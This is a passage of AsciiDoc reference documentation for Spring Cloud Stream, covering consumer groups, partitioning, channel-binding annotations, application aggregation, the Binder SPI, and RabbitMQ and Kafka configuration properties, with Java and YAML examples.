following figure, this property would be set as `spring.cloud.stream.bindings.input.group=hdfsWrite` or `spring.cloud.stream.bindings.input.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::SCSt-groups.png[width=300,scaledwidth=\"50%\"]\n\nAll groups which subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are _durable_.\nThat is, a binder implementation ensures that group subscriptions are persistent, and once at least one subscription for a group has been created, the group will receive messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (e.g., RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nThis prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for _partitioning_ data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (e.g., the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (e.g., Kafka) or not (e.g., RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::SCSt-partitioning.png[width=300,scaledwidth=\"50%\"]\n\nPartitioning is a critical concept in stateful processing, where it is essential, for either performance or consistency reasons, to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\n[NOTE]\n====\nTo set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n====\n\n== Programming Model\n\nThis section describes Spring Cloud Stream's programming model.\nSpring Cloud Stream provides a number of predefined annotations for declaring bound input and output channels as well as how to listen to channels.\n\n=== Declaring and Binding Channels\n\n==== Triggering Binding Via `@EnableBinding`\n\nYou can turn a Spring application into a Spring Cloud Stream application by applying the `@EnableBinding` annotation to one of the application's configuration classes.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the 
configuration of Spring Cloud Stream infrastructure:\n\n[source,java]\n----\n...\n@Import(...)\n@Configuration\n@EnableIntegration\npublic @interface EnableBinding {\n ...\n Class<?>[] value() default {};\n}\n----\n\nThe `@EnableBinding` annotation can take as parameters one or more interface classes that contain methods which represent bindable components (typically message channels).\n\n[NOTE]\n====\nIn Spring Cloud Stream 1.0, the only supported bindable components are the Spring Messaging `MessageChannel` and its extensions `SubscribableChannel` and `PollableChannel`.\nFuture versions should extend this support to other types of components, using the same mechanism.\nIn this documentation, we will continue to refer to channels.\n====\n\n==== `@Input` and `@Output`\n\nA Spring Cloud Stream application can have an arbitrary number of input and output channels defined in an interface as `@Input` and `@Output` methods:\n\n[source,java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing this interface as a parameter to `@EnableBinding` will trigger the creation of three bound channels named `orders`, `hotDrinks`, and `coldDrinks`, respectively.\n\n[source,java]\n----\n@EnableBinding(Barista.class)\npublic class CafeConfiguration {\n\n ...\n}\n----\n\n===== Customizing Channel Names\n\nUsing the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source,java]\n----\npublic interface Barista {\n ...\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn this example, the created bound channel will be named `inboundOrders`.\n\n===== `Source`, `Sink`, and `Processor`\n\nFor easy addressing of the most common use cases, which involve either an input channel, an output channel, or both, Spring Cloud Stream provides three predefined interfaces out of the box.\n\n`Source` can be used for an application which has a single outbound channel.\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\n`Sink` can be used for an application which has a single inbound channel.\n\n[source,java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n\n}\n----\n\n`Processor` can be used for an application which has both an inbound channel and an outbound channel.\n\n[source,java]\n----\npublic interface Processor extends Source, Sink {\n}\n----\n\nSpring Cloud Stream provides no special handling for any of these interfaces; they are only provided out of the box.\n\n==== Accessing Bound Channels\n\n===== Injecting the Bound Interfaces\n\nFor each bound interface, Spring Cloud Stream will generate a bean that implements the interface.\nInvoking an `@Input`-annotated or `@Output`-annotated method of one of these beans will return the relevant bound channel.\n\nThe bean in the following example sends a message on the output channel when its `sayHello` method is invoked.\nIt invokes `output()` on the injected `Source` bean to retrieve the target channel.\n\n[source,java]\n----\n@Component\npublic class SendingBean {\n\n private Source source;\n\n @Autowired\n public SendingBean(Source source) {\n this.source = source;\n }\n\n public void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(name).build());\n 
}\n}\n----\n\n===== Injecting Channels Directly\n\nBound channels can also be injected directly:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n private MessageChannel output;\n\n @Autowired\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n output.send(MessageBuilder.withPayload(name).build());\n }\n}\n----\n\nIf the name of the channel is customized on the declaring annotation, that name should be used instead of the method name.\nGiven the following declaration:\n\n[source,java]\n----\npublic interface CustomSource {\n ...\n @Output(\"customOutput\")\n MessageChannel output();\n}\n----\n\nThe channel will be injected as shown in the following example:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n private MessageChannel output;\n\n @Autowired\n public SendingBean(@Qualifier(\"customOutput\") MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n output.send(MessageBuilder.withPayload(name).build());\n }\n}\n----\n\n==== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application using either Spring Integration annotations or Spring Cloud Stream's `@StreamListener` annotation.\nThe `@StreamListener` annotation is modeled after other Spring Messaging annotations (such as `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.) but adds content type management and type coercion features.\n\n===== Native Spring Integration Support\n\nBecause Spring Cloud Stream is based on Spring Integration, Spring Cloud Stream completely inherits Spring Integration's foundation and infrastructure, as well as its components.\nFor example, you can attach the output channel of a `Source` to a `MessageSource`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Value(\"${format}\")\n private String format;\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"${fixedDelay}\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(new SimpleDateFormat(format).format(new Date()));\n }\n}\n----\n\nOr you can use a processor's channels in a transformer:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpperCase();\n }\n}\n----\n
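\nAny other Spring Integration endpoint annotation can be attached to the bound channels in the same way; for example, a minimal sketch using `@ServiceActivator` (the class and method names are illustrative):\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class ExclaimingActivator {\n\n \/\/ consumes from the bound input channel and sends the result to the bound output channel\n @ServiceActivator(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String exclaim(String message) {\n return message + \"!\";\n }\n}\n----\n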
\n===== Using @StreamListener for Automatic Content Type Handling\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations (e.g. `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.).\nThe `@StreamListener` annotation provides a simpler model for handling inbound messages, especially when dealing with use cases that involve content type management and type coercion.\n\nSpring Cloud Stream provides an extensible `MessageConverter` mechanism for handling data conversion on bound channels and, in this case, for dispatching to methods annotated with `@StreamListener`.\nThe following is an example of an application which processes external `Vote` events:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nThe distinction between `@StreamListener` and a Spring Integration `@ServiceActivator` is seen when considering an inbound `Message` that has a `String` payload and a `contentType` header of `application\/json`.\nIn the case of `@StreamListener`, the `MessageConverter` mechanism will use the `contentType` header to parse the `String` payload into a `Vote` object.\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers` and `@Header`.\n\n[NOTE]\n====\nFor methods which return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n====\n\n[NOTE]\n====\nIn the case of RabbitMQ, content type headers can be set by external applications.\nSpring Cloud Stream supports them as part of an extended internal protocol used for any type of transport (including transports, such as Kafka, that do not normally support headers).\n====\n\n==== Aggregation\n\nSpring Cloud Stream provides support for aggregating multiple applications together, connecting their input and output channels directly and avoiding the additional cost of exchanging messages via a broker.\nAs of version 1.0 of Spring Cloud Stream, aggregation is supported only for the following types of applications:\n\n* _sources_ - applications with a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Source`\n* _sinks_ - applications with a single input channel named `input`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Sink`\n* _processors_ - applications with a single input channel named `input` and a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Processor`.\n\nThey can be aggregated together by creating a sequence of interconnected applications, in which the output channel of an element in the sequence is connected to the input channel of the next element, if it exists.\nA sequence can start with either a _source_ or a _processor_; it can contain an arbitrary number of _processors_ and must end with either a _processor_ or a _sink_.\n\nDepending on the nature of the starting and ending element, the sequence may have one or more bindable channels, as follows:\n\n* if the sequence starts with a source and ends with a sink, all communication between the applications is direct and no channels 
will be bound\n* if the sequence starts with a processor, then its input channel will become the `input` channel of the aggregate and will be bound accordingly\n* if the sequence ends with a processor, then its output channel will become the `output` channel of the aggregate and will be bound accordingly\n\nAggregation is performed using the `AggregateApplicationBuilder` utility class, as in the following example.\nLet's consider a project in which we have a source, a processor, and a sink, which may be defined in the project, or may be contained in one of the project's dependencies.\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class SinkApplication {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(SinkApplication.class);\n\n\t@ServiceActivator(inputChannel=Sink.INPUT)\n\tpublic void loggerSink(Object payload) {\n\t\tlogger.info(\"Received: \" + payload);\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class ProcessorApplication {\n\n\t@Transformer\n\tpublic String transform(String payload) {\n\t\treturn payload.toUpperCase();\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic class SourceApplication {\n\n\t@InboundChannelAdapter(value = Source.OUTPUT)\n\tpublic String timerMessageSource() {\n\t\treturn new SimpleDateFormat().format(new Date());\n\t}\n}\n----\n\nEach configuration can be used for running a separate component, but in this case they can be aggregated together as follows:\n\n[source,java]\n----\n@SpringBootApplication\npublic class SampleAggregateApplication {\n\n\tpublic static void main(String[] args) {\n\t\tnew AggregateApplicationBuilder()\n\t\t\t.from(SourceApplication.class).args(\"--fixedDelay=5000\")\n\t\t\t.via(ProcessorApplication.class)\n\t\t\t.to(SinkApplication.class).args(\"--debug=true\").run(args);\n\t}\n}\n----\n\nThe starting component of the sequence is provided as an argument to the `from()` method.\nThe ending component of the sequence is provided as an argument to the `to()` method.\nIntermediate processors are provided as arguments to the `via()` method.\nMultiple processors of the same type can be chained together (e.g. 
for pipelining transformations with different configurations).\nFor each component, the builder can provide runtime arguments for Spring Boot configuration.\n\n\n==== RxJava Support\n\nSpring Cloud Stream provides support for RxJava-based processors through the `RxJavaProcessor` available in `spring-cloud-stream-rxjava`.\n\n[source,java]\n----\npublic interface RxJavaProcessor<I, O> {\n\tObservable<O> process(Observable<I> input);\n}\n----\n\nAn implementation of `RxJavaProcessor` will receive an `Observable` as input, representing the flow of inbound message payloads.\nThe `process` method is invoked once at startup for setting up the data flow.\n\nYou can enable RxJava-based processors in your processor application by using the `@EnableRxJavaProcessor` annotation.\n`@EnableRxJavaProcessor` is meta-annotated with `@EnableBinding(Processor.class)` and will create the `Processor` binding.\nHere is an example of an RxJava-based processor:\n\n[source,java]\n----\n@EnableRxJavaProcessor\npublic class RxJavaTransformer {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(RxJavaTransformer.class);\n\n\t@Bean\n\tpublic RxJavaProcessor<String,String> processor() {\n\t\treturn inputStream -> inputStream.map(data -> {\n\t\t\tlogger.info(\"Got data = \" + data);\n\t\t\treturn data;\n\t\t})\n\t\t.buffer(5)\n\t\t.map(data -> String.valueOf(avg(data)));\n\t}\n\n\tprivate static Double avg(List<String> data) {\n\t\tdouble sum = 0;\n\t\tdouble count = 0;\n\t\tfor(String d : data) {\n\t\t\tcount++;\n\t\t\tsum += Double.valueOf(d);\n\t\t}\n\t\treturn sum\/count;\n\t}\n}\n----\n\n\n[NOTE]\n====\nWhen implementing an RxJava processor, it is important to handle exceptions as part of your processing flow.\nUncaught exceptions will be treated as errors by RxJava and will cause the `Observable` to complete, disrupting the flow.\n====\n\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\n.Producers and Consumers\nimage::producers-consumers.png[width=300,scaledwidth=\"75%\"]\n\nA _producer_ is any component that sends messages to a channel.\nThe channel can be bound to an external message broker via a Binder implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer will send messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA _consumer_ is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (i.e., publish-subscribe semantics).\nIf there are multiple consumer instances bound using the same group name, then messages will be load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each 
group (i.e., queueing semantics).\n\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the-box utility classes, and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface, which is a strategy for connecting inputs and outputs to external middleware.\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n\tBinding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n\tBinding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* input and output bind targets - as of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future;\n* extended consumer and producer properties - allowing specific Binder implementations to add supplemental properties which can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following:\n\n* a class that implements the `Binder` interface;\n* a Spring `@Configuration` class that creates a bean of the type above along with the middleware connection infrastructure;\n* a `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, e.g.:\n\n[source]\n----\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n----\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\nOut of the box, Spring Cloud Stream provides binders for Kafka, RabbitMQ, and Redis.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream will use it automatically.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can simply add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders`, which is a simple properties file:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (e.g., Kafka), and custom binder implementations are expected to provide them, as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (e.g., `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application which reads from Kafka and writes to RabbitMQ can specify the following 
configuration:\n\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath will be created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\n[NOTE]\n====\nTurning on explicit binder configuration will disable the default binder configuration process altogether.\nIf you do this, all binders in use must be included in the configuration.\n====\n\nFor example, this is the typical configuration for a processor application which connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n  cloud:\n    stream:\n      bindings:\n        input:\n          destination: foo\n          binder: rabbit1\n        output:\n          destination: bar\n          binder: rabbit2\n      binders:\n        rabbit1:\n          type: rabbit\n          environment:\n            spring:\n              rabbitmq:\n                host: <host1>\n        rabbit2:\n          type: rabbit\n          environment:\n            spring:\n              rabbitmq:\n                host: <host2>\n----\n\n\n=== Implementation Strategies\n\nThis section details the binder implementation strategies for Kafka and Rabbit MQ, describing how the Spring Cloud Stream concepts map onto the middleware concepts.\n\n==== Kafka Binder\n\n.Kafka Binder\nimage::kafka-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe Kafka Binder implementation maps the destination to a Kafka topic.\nThe consumer group maps directly to the same Kafka concept.\nSpring Cloud Stream does not use the high-level consumer, but implements a similar concept for the simple consumer.\n\n\n==== RabbitMQ Binder\n\n.RabbitMQ Binder\nimage::rabbit-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe RabbitMQ Binder implementation maps the destination to a `TopicExchange`.\nFor each consumer group, a `Queue` will be bound to that `TopicExchange`.\nEach consumer instance that binds will trigger creation of a corresponding RabbitMQ `Consumer` instance for its group's `Queue`.\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders allow additional binding properties to support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications via any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Spring Cloud Stream Properties\n\nspring.cloud.stream.instanceCount::\n The number of deployed instances of an application.\nMust be set for partitioning and when using the Kafka binder.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\n The instance index of the application: a number from `0` to `instanceCount - 1`.\nUsed for partitioning and with Kafka.\nAutomatically set in Cloud Foundry to match the application's instance index.\n+\nDefault: `0`.\n\nspring.cloud.stream.dynamicDestinations::\n A list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (allowing any destination to be bound).\n\nspring.cloud.stream.defaultBinder::\n The default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied using the format 
`spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (e.g., `output` for a `Source`).\n\nIn what follows, we omit the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix is included at runtime.\n\n==== Properties for Use of Spring Cloud Stream\n\nThe following binding properties are available for both input and output bindings and\nmust be prefixed with `spring.cloud.stream.bindings.<channelName>.`.\n\ndestination::\n The target destination of a channel on the bound middleware (e.g., the RabbitMQ exchange or Kafka topic).\n If not set, the channel name is used instead.\ngroup::\n The consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: null (indicating an anonymous consumer).\ncontentType::\n The content type of the channel.\n\/\/See <<content type management>>.\n+\nDefault: null (so that no type coercion is performed).\nbinder::\n The binder used by this binding.\nSee <<multiple-binders>> for details.\n+\nDefault: null (the default binder will be used, if one exists).\n\n==== Consumer Properties\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.`.\n\nconcurrency::\n The concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\n Whether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\n When set to `raw`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when inbound data is coming from outside Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\nmaxAttempts::\n The number of attempts to process an inbound message (including the first delivery and any retries).\nCurrently ignored by Kafka.\n+\nDefault: `3`.\nbackOffInitialInterval::\n The backoff initial interval on retry.\nCurrently ignored by Kafka.\n+\nDefault: `1000`.\nbackOffMaxInterval::\n The maximum backoff interval.\nCurrently ignored by Kafka.\n+\nDefault: `10000`.\nbackOffMultiplier::\n The backoff multiplier.\n+\nDefault: `2.0`.\n\n==== Producer Properties\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.`.\n\npartitionKeyExpression::\n A SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionKeyExtractorClass::\n A `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionSelectorClass::\n A `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: 
null.\npartitionSelectorExpression::\n A SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionCount::\n The number of target partitions for the data, if partitioning is enabled.\nMust be set to a value greater than 1 if the producer is partitioned.\nOn Kafka, interpreted as a hint; the larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\n A comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (e.g., by pre-creating durable queues in RabbitMQ).\nheaderMode::\n When set to `raw`, disables header embedding on output.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when producing data for non-Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\n\n[[binder-specific-configuration]]\n== Binder-Specific Configuration\n\nThe following binder, consumer, and producer properties are specific to binder implementations.\n\n=== Rabbit-Specific Settings\n\n==== RabbitMQ Binder Properties\n\nBy default, the RabbitMQ binder uses Spring Boot's `ConnectionFactory`, and it therefore supports all Spring Boot configuration options for RabbitMQ.\n(For reference, consult the http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#common-application-properties[Spring Boot documentation].) RabbitMQ configuration options use the `spring.rabbitmq` prefix.\n\nIn addition to the Spring Boot options, the RabbitMQ binder supports the following properties:\n\nspring.cloud.stream.rabbit.binder.adminAddresses::\n A comma-separated list of RabbitMQ management plugin URLs.\nOnly used when `nodes` contains more than one entry.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.nodes::\n A comma-separated list of RabbitMQ node names.\nWhen it contains more than one entry, it is used to locate the server address where a queue is located.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.compressionLevel::\n Compression level for compressed bindings.\nSee `java.util.zip.Deflater`.\n+\nDefault: `1` (`Deflater.BEST_SPEED`).\n\n==== RabbitMQ Consumer Properties\n\nThe following properties are available for Rabbit consumers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.consumer.`.\n\nacknowledgeMode::\n The acknowledge mode.\n+\nDefault: `AUTO`.\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\ndurableSubscription::\n Whether the subscription should be durable.\nOnly effective if `group` is also set.\n+\nDefault: `true`.\nmaxConcurrency::\n Default: `1`.\nprefetch::\n Prefetch count.\n+\nDefault: `1`.\nprefix::\n A prefix to be added to the name of the `destination` and queues.\n+\nDefault: \"\".\nrequeueRejected::\n Whether delivery failures should be requeued.\n+\nDefault: `true`.\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nrepublishToDlq::\n By default, messages which fail after retries are exhausted are rejected.\nIf a dead-letter queue (DLQ) is configured, RabbitMQ will route the failed message (unchanged) to the DLQ.\nIf set to `true`, the binder will republish failed messages to the DLQ with additional headers, including the exception message and stack trace from the cause of the final failure.\ntransacted::\n Whether to use transacted channels.\n+\nDefault: `false`.\ntxSize::\n The number of deliveries between acks.\n+\nDefault: `1`.\n
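\nFor example, to declare a dead-letter queue for the group of the `input` channel and have failed messages republished to it with diagnostic headers (a sketch assuming the channel name `input`):\n\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.autoBindDlq=true\nspring.cloud.stream.rabbit.bindings.input.consumer.republishToDlq=true\n----\n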
\n==== Rabbit Producer Properties\n\nThe following properties are available for Rabbit producers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.producer.`.\n\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\nbatchingEnabled::\n Whether to enable message batching by producers.\n+\nDefault: `false`.\nbatchSize::\n The number of messages to buffer when batching is enabled.\n+\nDefault: `100`.\nbatchBufferLimit::\n Default: `10000`.\nbatchTimeout::\n Default: `5000`.\ncompress::\n Whether data should be compressed when sent.\n+\nDefault: `false`.\ndeliveryMode::\n Delivery mode.\n+\nDefault: `PERSISTENT`.\nprefix::\n A prefix to be added to the name of the `destination` exchange.\n+\nDefault: \"\".\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\n\n=== Kafka-Specific Settings\n\n==== Kafka Binder Properties\n\nspring.cloud.stream.kafka.binder.brokers::\n A list of brokers to which the Kafka binder will connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultBrokerPort::\n `brokers` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the broker list.\n+\nDefault: `9092`.\nspring.cloud.stream.kafka.binder.zkNodes::\n A list of ZooKeeper nodes to which the Kafka binder can connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultZkPort::\n `zkNodes` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the node list.\n+\nDefault: `2181`.\nspring.cloud.stream.kafka.binder.headers::\n The list of custom headers that will be transported by the binder.\n+\nDefault: empty.\nspring.cloud.stream.kafka.binder.offsetUpdateTimeWindow::\n The frequency, in milliseconds, with which offsets are saved.\nIgnored if `0`.\n+\nDefault: `10000`.\nspring.cloud.stream.kafka.binder.offsetUpdateCount::\n The frequency, in number of updates, with which consumed offsets are persisted.\nIgnored if `0`.\nMutually exclusive with `offsetUpdateTimeWindow`.\n+\nDefault: `0`.\nspring.cloud.stream.kafka.binder.requiredAcks::\n The number of required acks on the broker.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.minPartitionCount::\n Effective only if `autoCreateTopics` or `autoAddPartitions` is set.\nThe global minimum number of partitions that the binder will configure on topics on which it produces\/consumes data.\nIt can be superseded by the `partitionCount` setting of the producer or by the value of `instanceCount` * `concurrency` settings of the producer (if either is larger).\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.replicationFactor::\n The replication factor of 
